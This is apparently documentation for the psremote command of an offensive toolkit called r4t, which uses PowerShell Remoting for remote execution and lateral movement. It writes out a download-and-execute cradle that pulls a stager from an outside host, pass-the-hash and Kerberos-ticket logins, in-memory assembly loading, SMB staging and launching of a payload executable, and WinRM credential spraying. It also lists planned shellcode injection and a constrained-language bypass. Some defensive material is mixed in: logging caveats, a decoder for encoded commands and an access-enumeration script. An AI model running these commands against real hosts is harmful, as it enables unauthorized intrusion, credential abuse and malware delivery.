Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
psremote
The psremote command provides PowerShell Remoting operations for remote command execution, script delivery, and interactive sessions over WS-Management.
Usage
```bash
r4t psremote <subcommand> [flags]
```
Overview
PowerShell Remoting (PSRemote) is a protocol built on top of WS-Management (WinRM) that enables operators to execute PowerShell commands and scripts on remote Windows hosts. It operates over HTTP (port 5985) or HTTPS (port 5986) and is one of the most common administrative remote access methods in Windows enterprise environments.
PSRemote is distinct from raw WinRM command execution — it provides a full PowerShell runspace on the remote host, enabling cmdlet execution, pipeline operations, and module loading that are not possible through basic cmd.exe execution.
Planned Capabilities
| Capability | Description |
|---|---|
| Command Execution | Execute PowerShell commands on remote hosts |
| Script Execution | Run PowerShell script files (.ps1) remotely |
| Interactive Session | Establish an interactive PowerShell Remoting session |
| Constrained Language Bypass | Execute in Full Language Mode where possible |
| Module Loading | Import and execute PowerShell modules remotely |
Authentication
PSRemote uses the same global authentication flags as all other R4t commands. The following authentication methods are supported:
| Method | Flag | Description |
|---|---|---|
| Password | -u / -p | Domain username and password |
| NTLM Hash | --hash | Pass-the-hash via NT hash |
| Kerberos | --aes / --ccache | Kerberos authentication via AES key or ccache |
| Certificate (PFX) | --pfx | PFX certificate authentication |
| Certificate (PEM) | --cert / --key | PEM certificate and key authentication |
| Anonymous | --anonymous | Unauthenticated access |
Examples
```bash
# Execute a PowerShell command
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Get-Process | Select-Object -First 10"

# Run a script file
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  -f ./enum-script.ps1

# Use NTLM hash authentication (LM:NT format; the LM half is the empty-LM constant)
r4t psremote exec -u admin --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 \
  10.10.10.20 "whoami /all"

# Use Kerberos via ccache
r4t psremote exec --ccache /tmp/krb5cc_admin -d corp.example.com 10.10.10.20 \
  "Get-ADUser -Filter * | Select-Object Name, Enabled"

# Use stored credentials
r4t psremote exec --credential-id 1 10.10.10.20 "hostname"
```
Connection Details
| Property | Value |
|---|---|
| Protocol | PowerShell Remoting over WS-Management |
| HTTP Port | 5985 |
| HTTPS Port | 5986 |
| Authentication | NTLM, Kerberos, Basic, Certificate |
| Remote Shell | Full PowerShell runspace |
| Access Group | Remote Management Users (RID 580) |
Payload Execution via PSRemote
PSRemote is a primary execution channel for delivering payloads to remote hosts. Its PowerShell runspace enables both fileless in-memory execution and disk-based delivery. Fileless does not mean unlogged: with script block logging enabled, the text handed to Invoke-Expression is recorded in the PowerShell Operational log (Event ID 4104), and everything runs under wsmprovhost.exe, which is a simple process-ancestry signal for defenders. Large in-memory payloads are also bounded by the WinRM MaxEnvelopeSizekb setting (500 KB by default), so a big base64-encoded assembly may need to be staged in chunks or fetched by a small cradle instead.
Fileless Execution
```bash
# Download and execute in memory (cradle)
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/stager.ps1')"

# Encoded command execution
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  --encoded "<base64-encoded-powershell>"

# Load a managed (.NET) assembly from memory via reflection. Assembly.Load only
# maps the assembly; its entry point or a type's method must then be invoked.
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "[System.Reflection.Assembly]::Load([Convert]::FromBase64String('<b64-dll>'))"
```
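The --encoded form above takes a base64 string. The following PowerShell helpers are an added example, not code from r4t or this page: they produce the encoding that powershell.exe -EncodedCommand expects (the script as UTF-16LE text, then base64) and reverse it, so the same decoder can recover an encoded command from a process-creation log line. It assumes that r4t's --encoded expects this same format; if it does not, the encoder still documents the native convention, and the decoder is unaffected. The function names, the sample script and the sample log line are constructed for the example.

```powershell
# Added example (not r4t code): encode/decode PowerShell in the -EncodedCommand format.
# Assumption: r4t's --encoded takes the same base64(UTF-16LE) string that
# powershell.exe -EncodedCommand takes; confirm against the tool before relying on it.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # powershell.exe decodes -EncodedCommand as UTF-16LE, not UTF-8/ASCII; the
    # wrong encoding yields a command that "runs" but is garbage.
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($Script))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Pull the encoded argument out of a command line as it appears in a 4688 or
# Sysmon Event ID 1 record. powershell.exe accepts unambiguous prefixes of
# -EncodedCommand (-e, -ec, -enc, ...), so the pattern covers that family rather
# than one spelling. Returns the decoded script, or $null if nothing is found.
function Get-EncodedCommandFromLogLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    $pattern = '(?i)(?:^|\s)[-/]e(?:c|n(?:c(?:oded(?:command)?)?)?)?\s+([A-Za-z0-9+/=]{8,})'
    $m = [regex]::Match($CommandLine, $pattern)
    if (-not $m.Success) { return $null }
    try { ConvertFrom-EncodedCommand $m.Groups[1].Value } catch { $null }
}

# Multi-line script that would otherwise need quoting gymnastics on the command line
$script = @'
$p = Get-Process | Sort-Object WorkingSet -Descending | Select-Object -First 5 Name, Id
$p | ConvertTo-Json -Compress
'@
$encoded = ConvertTo-EncodedCommand $script

# Constructed sample: the same command as a defender sees it in a process-creation log
$sampleLog = "powershell.exe -NoP -W Hidden -enc $encoded"
$recovered = Get-EncodedCommandFromLogLine $sampleLog
if ($recovered -ne $script) { throw 'round trip failed' }

ConvertTo-EncodedCommand 'whoami'   # dwBoAG8AYQBtAGkA
```

The round trip is the point: anything sent through --encoded that ends up in a command line or a 4104 script block is one base64 decode away from plaintext, so encoding buys quoting convenience, not concealment.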
Disk-Based Execution
```bash
# Stage payload via SMB, execute via PSRemote
r4t smb put -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  ./payload.exe C:\Windows\Temp\svc.exe
r4t psremote exec -u admin -p 'P@ssw0rd' -d corp.example.com 10.10.10.20 \
  "Start-Process C:\Windows\Temp\svc.exe"
```
Payload Factory Integration
When the payload factory is operational, PSRemote execution modules will request artifacts by capability:
| Capability Request | Use Case |
|---|---|
| execution=script, type=ps1 | PowerShell stager for direct execution |
| inmemory=true, execution=script | Fileless execution via encoded PowerShell |
| reflective=true, execution=reflective-load | Managed (.NET) assembly loaded in memory via [Reflection.Assembly]::Load |
| execution=self-exec, os=windows | Standard EXE executed after file transfer |
| type=shellcode, inmemory=true | Shellcode injected via PowerShell process injection |
Remote Management Users (RID 580)
Access to PSRemote on a host is governed by the ACL of the PowerShell session configuration on the target. By default that ACL grants local Administrators and members of the Remote Management Users local group (well-known SID S-1-5-32-580, RID 580); a user in neither cannot open a session even with valid credentials. An administrator can widen or narrow that list, so group membership alone is not the whole story on a hardened host.
This group is critical for attack path analysis: any user with Remote Management Users membership on a host can execute arbitrary PowerShell commands there in that user's security context. Membership does not by itself confer administrative rights, but it turns a valid credential into code execution on the host.
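An added check, written here as example code rather than something r4t ships: enumerate who can actually open a remoting session on a host by reading the two default-privileged local groups by well-known SID and the permission list of every registered session configuration, which is what WinRM enforces when an administrator has customized access. It assumes an administrative session on the queried host (Get-PSSessionConfiguration requires one) and reaches remote hosts through Invoke-Command, i.e. over the same WinRM channel. The function name Get-PSRemotingAccess is this example's own.

```powershell
# Added example (not r4t code): who may open a PowerShell Remoting session on a host?
# Needs an administrative session on the queried host, because
# Get-PSSessionConfiguration reads the session-configuration ACLs.
function Get-PSRemotingAccess {
    [CmdletBinding()]
    param(
        # Host to inspect; defaults to the local machine
        [string]$ComputerName = $env:COMPUTERNAME,
        [System.Management.Automation.PSCredential]$Credential
    )

    $probe = {
        # Well-known SIDs, so the lookup works regardless of display-name localisation
        $groups = [ordered]@{
            'BUILTIN\Administrators'          = 'S-1-5-32-544'
            'BUILTIN\Remote Management Users' = 'S-1-5-32-580'
        }
        foreach ($g in $groups.GetEnumerator()) {
            # Get-LocalGroupMember aborts on an orphaned (unresolvable) SID inside the
            # group, so an empty result for a group deserves a manual look rather than
            # being read as "nobody".
            Get-LocalGroupMember -SID $g.Value -ErrorAction SilentlyContinue | ForEach-Object {
                [pscustomobject]@{
                    Source    = $g.Key
                    Principal = $_.Name
                    Kind      = $_.ObjectClass
                }
            }
        }
        # The session-configuration ACL is what WinRM actually enforces; a hardened host
        # may have removed Remote Management Users or granted other groups here.
        foreach ($cfg in Get-PSSessionConfiguration) {
            [pscustomobject]@{
                Source    = "SessionConfiguration:$($cfg.Name)"
                Principal = $cfg.Permission
                Kind      = 'ACL'
            }
        }
    }

    if ($ComputerName -ieq $env:COMPUTERNAME) {
        & $probe
    } else {
        # An IP address target cannot use Kerberos; the client then needs the host in
        # its TrustedHosts list (or an HTTPS listener) before NTLM will be attempted.
        $params = @{ ComputerName = $ComputerName; ScriptBlock = $probe }
        if ($Credential) { $params.Credential = $Credential }
        Invoke-Command @params | Select-Object Source, Principal, Kind
    }
}

# Usage: Get-PSRemotingAccess -ComputerName 10.10.10.20 -Credential (Get-Credential 'corp\admin')
```

Reading both sources matters because they answer different questions: the group membership tells you which principals an attack graph should link to the host, while the session-configuration permission string tells you whether that link is real on this particular host.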
Spray Integration
PSRemote credential validation can be tested through the WinRM spray protocol, since PSRemote operates over WinRM:
```bash
# Spray PSRemote/WinRM targets
r4t spray winrm 10.10.10.20 10.10.10.21

# Spray with stored users
r4t spray winrm --db-users --stop-on-lockout 10.10.10.20
```
Related Commands
winrm — Raw WinRM command execution (cmd.exe level)
wmi — WMI remote execution (alternative lateral movement)
smb — SMB file operations (payload staging)
spray — Multi-protocol credential spraying
bloodhound — BloodHound collection (includes psremote collection method)